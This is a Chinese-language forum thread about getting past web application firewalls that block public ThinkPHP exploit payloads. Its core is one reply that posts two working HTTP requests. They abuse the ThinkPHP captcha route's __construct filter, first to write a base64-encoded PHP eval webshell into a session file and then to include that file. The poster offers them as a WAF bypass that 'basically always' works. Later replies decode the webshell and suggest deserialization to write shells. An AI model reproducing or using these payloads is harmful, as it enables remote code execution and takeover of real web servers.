waf绕过,过滤了cms的payload怎么绕过

平时项目总总能遇到已知的cms,比如 thinkphp,但是如果直接使用公开的payload,直接就被防了,请问一下各位师傅,这种绕过的方式跟绕注入是一样的吗:更换函数,大小写,编码吗?

其实方向是没多大的问题,只不过你这种绕过得根据实际情况来看,看是过滤还是拦截,如果是拦截那你就得可能想着去利用特性一些的东西让你的内容会后端许可的同时绕过waf。像tp的代码执行很多waf拦截了但其实还是有方法绕过的,你如果对这个漏洞真正的理解了,你就有很多的利用方法去尝试以及你对语言理解好,你可以考虑通过语言特性去尝试

1 个赞
POST /?s=captcha
Cookie: PHPSESSID=kktest

_method=__construct&filter[]=think\Session::set&method=get&get[]=abPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX0dFVFsnciddKSk7Oz8%2bab&server[]=1


POST /?s=captcha&r=cGhwaW5mbygpOw==

_method=__construct&filter[]=strrev&filter[]=think\__include_file&method=get&server[]=1&get[]=tsetkk_sses/pmt/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php
网址处直接写入shell即可

tp我常用这个,基本都能绕过

1 个赞

那如果是过滤了呢

请问一下老哥abPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX0dFVFsnciddKSk7Oz8%2bab

<?php @eval(base64_decode($_GET['r']));;?

这是什么加密,先url编码接了,然后base出不来啊

老大哥能不能留一个联系方式

Base64加密呀,你把前后两个ab和%2b去掉试试

<?php @eval(base64_decode($_GET['r']));;?>
<?php @eval(base64_decode($_GET['r']));;?>

出来了,谢谢大佬

谢谢师傅 后面可以尝试一下师傅得payload

嗯嗯 确实不怎么理解漏洞,后面也希望在这方面加强 谢谢师傅

其实也可以试试利用反序列化来打。有的版本可以一发入魂直接写shell

哪位大神写个万能绕waf就给力

不可能有万能绕waf 写出来瞬间给你封了 永世不得超生